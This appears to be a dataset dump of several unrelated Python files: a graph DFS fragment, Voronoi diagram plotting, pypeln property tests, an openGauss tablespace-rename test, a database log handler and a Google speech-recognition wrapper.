if(graph[s][i] == 1):
if(color[i] == 0):
parent[i] = s
DFSvisit(graph, v, i, color, parent, time)
color[s] = 1
time += 1
def main():
Graph=[[0, 1, 1, 0, 0, 0],
[1, 0, 0, 1, 0, 0],
[0, 0, 1, 0, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1]]
v = len(Graph[0])
DFS(Graph, v)
if __name__ == '__main__':
main()
| StarcoderdataPython |
8085760 | <reponame>juancalheiros/voronoi-diagrams
import numpy as np
import matplotlib.pyplot as plt
from scipy.spatial import Voronoi, voronoi_plot_2d, Delaunay
def display_voronoi(points_x, points_y, COLOR_POINT):
plt.plot(points_x, points_y,'o', color=COLOR_POINT)
def display_delaunay(points_x, points_y, points_indices, COLOR_POINT):
plt.triplot(points_x, points_y, points_indices, color=COLOR_POINT)
def adjust_limit_axis(min_x, max_x, min_y, max_y):
plt.xlim((min_x*0.996, max_x*1.001))
plt.ylim((min_y*0.9997, max_y*1.0005))
def get_valid_region_voronoi(voronoi_regions):
return [region for region in voronoi_regions if not -1 in region ]
def colorize_polygon_voronoi(area, voronoi_vertices):
polygon = [voronoi_vertices[i] for i in area]
plt.fill(*zip(*polygon), alpha=0.6)
def colorize_diagrama_voronoi(voronoi_regions, voronoi_vertices):
areas = get_valid_region_voronoi(voronoi_regions)
for area in areas:
colorize_polygon_voronoi(area, voronoi_vertices)
def get_max_points(coordinates):
return max(i[0] for i in coordinates), max(i[1] for i in coordinates)
def get_min_points(coordinates):
return min(i[0] for i in coordinates) , min(i[1] for i in coordinates)
def limits_axis(max_x, max_y):
WIDTH = max_x*2
HEIGHT = max_y*2
return [[WIDTH, HEIGHT], [-WIDTH, HEIGHT], [WIDTH, -HEIGHT], [-WIDTH, -HEIGHT]]
def diagrams_of_voronoi(coordinates):
COLOR_BLUE = 'blue'
COLOR_BLACK = 'black'
max_x, max_y = get_max_points(coordinates)
min_x, min_y = get_min_points(coordinates)
limits = limits_axis(max_x, max_y)
# add 4 distant dummy points
points = np.append(coordinates, limits, axis=0)
delaunay = Delaunay(coordinates)
# compute Voronoi tesselation
voronoi = Voronoi(points)
POINTS_X = points[:,0]
POINTS_Y = points[:,1]
INDICES_TRIANGULATION_POINTS = delaunay.simplices
voronoi_plot_2d(voronoi, show_vertices=False)
colorize_diagrama_voronoi(voronoi.regions, voronoi.vertices)
adjust_limit_axis(min_x, max_x, min_y, max_y)
display_delaunay(POINTS_X, POINTS_Y, INDICES_TRIANGULATION_POINTS, COLOR_BLACK)
display_voronoi(POINTS_X, POINTS_Y, COLOR_BLUE)
plt.show()
| StarcoderdataPython |
278020 | import sys
import time
import typing as tp
from unittest import TestCase
import hypothesis as hp
from hypothesis import strategies as st
import pypeln as pl
MAX_EXAMPLES = 10
T = tp.TypeVar("T")
class TestEach(TestCase):
@hp.given(nums=st.lists(st.integers()))
@hp.settings(max_examples=MAX_EXAMPLES)
def test_each(self, nums: tp.List[int]):
nums_pl = pl.task.each(lambda x: x, nums)
assert nums is not None
if nums_pl is not None:
pl.task.run(nums_pl)
@hp.given(nums=st.lists(st.integers()))
@hp.settings(max_examples=MAX_EXAMPLES)
def test_each_list(self, nums: tp.List[int]):
nums_pl = pl.task.each(lambda x: x, nums)
assert nums is not None
if nums_pl is not None:
nums_pl = list(nums_pl)
if nums:
assert nums_pl != nums
else:
assert nums_pl == nums
assert nums_pl == []
@hp.given(nums=st.lists(st.integers()))
@hp.settings(max_examples=MAX_EXAMPLES)
def test_each_run(self, nums: tp.List[int]):
nums_pl = pl.task.each(lambda x: x, nums, run=True)
assert nums_pl is None
@hp.given(nums=st.lists(st.integers()))
@hp.settings(max_examples=MAX_EXAMPLES)
@pl.task.utils.run_test_async
async def test_each_list_2(self, nums: tp.List[int]):
nums_pl = pl.task.each(lambda x: x, nums)
assert nums is not None
if nums_pl is not None:
nums_pl = await nums_pl
if nums:
assert nums_pl != nums
else:
assert nums_pl == nums
assert nums_pl == []
@hp.given(nums=st.lists(st.integers()))
@hp.settings(max_examples=MAX_EXAMPLES)
@pl.task.utils.run_test_async
async def test_each_list_3(self, nums: tp.List[int]):
nums_pl = await pl.task.each(lambda x: x, nums)
assert nums_pl == []
@hp.given(nums=st.lists(st.integers()))
@hp.settings(max_examples=MAX_EXAMPLES)
@pl.task.utils.run_test_async
async def test_each_list_4(self, nums: tp.List[int]):
nums_pl = await (pl.task.each(lambda x: x, nums))
assert nums_pl == []
| StarcoderdataPython |
5175711 | <filename>openGaussBase/testcase/SQL/DDL/tablespace/Opengauss_Function_DDL_Tablespace_Case0024.py<gh_stars>0
"""
Copyright (c) 2022 Huawei Technologies Co.,Ltd.
openGauss is licensed under Mulan PSL v2.
You can use this software according to the terms and conditions of the Mulan PSL v2.
You may obtain a copy of Mulan PSL v2 at:
http://license.coscl.org.cn/MulanPSL2
THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND,
EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT,
MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
See the Mulan PSL v2 for more details.
"""
"""
Case Type : 功能测试-表空间
Case Name : 表空间修改-重命名
Description :
1、修改不存在的表空间名为另一已存在表空间名
2、修改不存在的表空间名为另一不存在表空间名
3、修改已存在的表空间名为另一已存在表空间名
4、修改已存在的表空间名为pg_开头的表空间名
5、修改已存在的表空间名为不存在表空间名
Expect :
1、修改不存在的表空间名为另一已存在表空间名,修改失败
2、修改不存在的表空间名为另一不存在表空间名,修改失败
3、修改已存在的表空间名为另一已存在表空间名,修改失败
4、修改已存在的表空间名为pg_开头的表空间名,修改失败
5、修改已存在的表空间名为另一不存在表空间名,修改成功
History :
"""
import os
import unittest
from testcase.utils.CommonSH import CommonSH
from testcase.utils.Constant import Constant
from testcase.utils.Logger import Logger
from yat.test import macro
class Tablespace(unittest.TestCase):
def setUp(self):
self.log = Logger()
self.log.info(f'-----{os.path.basename(__file__)} start-----')
self.sh = CommonSH('PrimaryDbUser')
self.constant = Constant()
self.tbspc_name1 = 'tsp_tbspc0024_1'
self.tbspc_location1 = 'tbspc0024_1'
self.tbspc_name2 = 'tsp_tbspc0024_2'
self.tbspc_location2 = 'tbspc0024_2'
self.tbspc_name3 = 'tsp_tbspc0024_3'
self.tbspc_name4 = 'pg_tsp_tbspc0024_4'
self.pwd = <PASSWORD>
self.sys_user = 'u_tbspc0024'
self.connect_sys = f'-U {self.sys_user} -W {self.pwd}'
self.err_flag1 = f'ERROR: tablespace "{self.tbspc_name2}"' \
f' does not exist'
self.err_flag2 = f'ERROR: tablespace "{self.tbspc_name2}"' \
f' already exists'
self.err_flag3 = 'DETAIL: The prefix "pg_" is reserved ' \
'for system tablespaces.'
def test_main(self):
step_txt = '----step0:创建系统管理员; expect:创建成功----'
self.log.info(step_txt)
create_sql = f"drop tablespace if exists {self.tbspc_name1}; " \
f"drop tablespace if exists {self.tbspc_name2}; " \
f"drop user if exists {self.sys_user} cascade; " \
f"create user {self.sys_user} sysadmin password '{<PASSWORD>}';"
self.log.info(create_sql)
create_result = self.sh.execut_db_sql(create_sql)
self.log.info(create_result)
assert_flag = create_result.splitlines().count(
self.constant.CREATE_ROLE_SUCCESS_MSG)
self.assertEqual(assert_flag, 1, "执行失败" + step_txt)
step_txt = '----step0:创建tablespace1; expect:创建成功----'
self.log.info(step_txt)
create_sql = f"create tablespace {self.tbspc_name1} " \
f"relative location '{self.tbspc_location1}';"
create_result = self.sh.execut_db_sql(create_sql,
sql_type=self.connect_sys)
self.log.info(create_result)
self.assertIn(self.constant.TABLESPCE_CREATE_SUCCESS, create_result,
"执行失败" + step_txt)
self.log.info('--查询tablespace oid--')
select_sql = f"select oid from pg_tablespace where " \
f"spcname = '{self.tbspc_name1}';"
tblspc1_oid = self.sh.execut_db_sql(select_sql).splitlines()[-2]
self.log.info(tblspc1_oid)
step_txt = '----step1:修改不存在的表空间名为另一已存在表空间名; expect:修改失败----'
self.log.info(step_txt)
alter_sql = f"alter tablespace {self.tbspc_name2} " \
f"rename to {self.tbspc_name1};"
alter_result = self.sh.execut_db_sql(alter_sql,
sql_type=self.connect_sys)
self.log.info(alter_result)
self.assertIn(self.err_flag1, alter_result, "执行失败" + step_txt)
step_txt = '----step2:修改不存在的表空间名为另一不存在表空间名; expect:修改失败----'
self.log.info(step_txt)
alter_sql = f"alter tablespace {self.tbspc_name2} " \
f"rename to {self.tbspc_name3};"
alter_result = self.sh.execut_db_sql(alter_sql,
sql_type=self.connect_sys)
self.log.info(alter_result)
self.assertIn(self.err_flag1, alter_result, "执行失败" + step_txt)
step_txt = '----step0:创建tablespace2; expect:创建成功----'
self.log.info(step_txt)
create_sql = f"create tablespace {self.tbspc_name2} " \
f"relative location '{self.tbspc_location2}';"
create_result = self.sh.execut_db_sql(create_sql,
sql_type=self.connect_sys)
self.log.info(create_result)
self.assertIn(self.constant.TABLESPCE_CREATE_SUCCESS, create_result,
"执行失败" + step_txt)
step_txt = '----step3:修改已存在的表空间名为另一已存在表空间名; expect:修改失败----'
self.log.info(step_txt)
alter_sql = f"alter tablespace {self.tbspc_name1} " \
f"rename to {self.tbspc_name2};"
alter_result = self.sh.execut_db_sql(alter_sql,
sql_type=self.connect_sys)
self.log.info(alter_result)
self.assertIn(self.err_flag2, alter_result, "执行失败" + step_txt)
step_txt = '----step4:修改已存在的表空间名为pg_开头的表空间名; expect:修改失败----'
self.log.info(step_txt)
alter_sql = f"alter tablespace {self.tbspc_name2} " \
f"rename to {self.tbspc_name4};"
alter_result = self.sh.execut_db_sql(alter_sql,
sql_type=self.connect_sys)
self.log.info(alter_result)
self.assertIn(self.err_flag3, alter_result, "执行失败" + step_txt)
step_txt = '----step5:修改已存在的表空间名为不存在表空间名; expect:修改成功----'
self.log.info(step_txt)
alter_sql = f"alter tablespace {self.tbspc_name1} " \
f"rename to {self.tbspc_name3};"
alter_result = self.sh.execut_db_sql(alter_sql,
sql_type=self.connect_sys)
self.log.info(alter_result)
self.assertIn(self.constant.TABLESPCE_ALTER_SUCCESS, alter_result,
"执行失败" + step_txt)
self.log.info('--查询tablespace所有者--')
select_sql = f'select spcname from pg_tablespace ' \
f'where oid = {tblspc1_oid};'
new_name = self.sh.execut_db_sql(select_sql).splitlines()[-2].strip()
self.log.info(new_name)
self.assertEqual(self.tbspc_name3, new_name)
def tearDown(self):
self.log.info('----this is teardown----')
step1_txt = '----清理表空间及用户; expect:成功----'
self.log.info(step1_txt)
clean_sql = f"drop tablespace if exists {self.tbspc_name1}; " \
f"drop tablespace if exists {self.tbspc_name2}; " \
f"drop tablespace if exists {self.tbspc_name3}; " \
f"drop user if exists {self.sys_user} cascade; "
clean_result = self.sh.execut_db_sql(clean_sql)
self.log.info(clean_result)
self.log.info(f'-----{os.path.basename(__file__)} end-----')
drop_user = clean_result.count(self.constant.DROP_ROLE_SUCCESS_MSG)
drop_tbspc = clean_result.count(self.constant.TABLESPCE_DROP_SUCCESS)
self.assertEqual(1, drop_user, "执行失败" + step1_txt)
self.assertEqual(3, drop_tbspc, "执行失败" + step1_txt)
| StarcoderdataPython |
1743175 | <gh_stars>1-10
# -*- coding: utf-8 -*-
from logging import Handler
class DBLogHandler(Handler, object):
def __init__(self):
super(DBLogHandler, self).__init__()
def emit(self, record):
from .models import DBLogEntry as _LogEntry
entry = _LogEntry()
entry.level = record.levelname
entry.message = self.format(record)
entry.module = record.name
try:
entry.event = record.event
except:
try:
entry.event_id = record.event_id
except:
pass
try:
entry.user = record.user
except:
pass
entry.save()
| StarcoderdataPython |
8005473 | <filename>homeserver/voice_control/google_speech.py
#!/usr/bin/env python
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import io
import os
# Imports the Google Cloud client library
# [START speech_python_migration_imports]
from google.cloud import speech
from google.cloud.speech import enums, types
# class for recording
from homeserver.voice_control.voice_service import record_audio
class GoogleVoiceRecognition():
def __init__(self, google_api_credential_path):
print("initialising google voice recognition")
"""
Give an absolute path to the google credentials (loaded from server.ini)
"""
#instead create the client from a credential json
self.client =speech.SpeechClient.from_service_account_file(google_api_credential_path)
def listen_to_command(self):
command_time = 4
print("Starting recording for google")
if not self.client:
print("no client for google")
return None
#listen to microphone
file_name = record_audio(command_time, os.path.join(os.path.dirname(__file__), 'resources', 'mysound.vaw'))
if not file_name:
print("failure in recording")
return None
self.interpret_command(file_name)
def interpret_command(self, file_name, keyphrases=[]):
"""
Sends given audio file (with full path) to google and returns
the interpreted speech as string.
Keyphrases is an optional list of strings that helps google notice
keywords
"""
print("sending audio to google")
# Loads the audio into memory
with io.open(file_name, 'rb') as audio_file:
content = audio_file.read()
audio = types.RecognitionAudio(content=content)
#loads the keyphrases into an object
speech_context = speech.types.SpeechContext(phrases=keyphrases)
config = types.RecognitionConfig(
encoding=enums.RecognitionConfig.AudioEncoding.LINEAR16,
sample_rate_hertz=16000,
language_code='fi-FI', #en-US
speech_contexts=[speech_context])
# Detects speech in the audio file
response = self.client.recognize(config, audio)
transcript = None
#only take the first result and the first transcript
for result in response.results:
print('Transcript: {}'.format(result.alternatives[0].transcript))
transcript = result.alternatives[0].transcript
break
return transcript
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.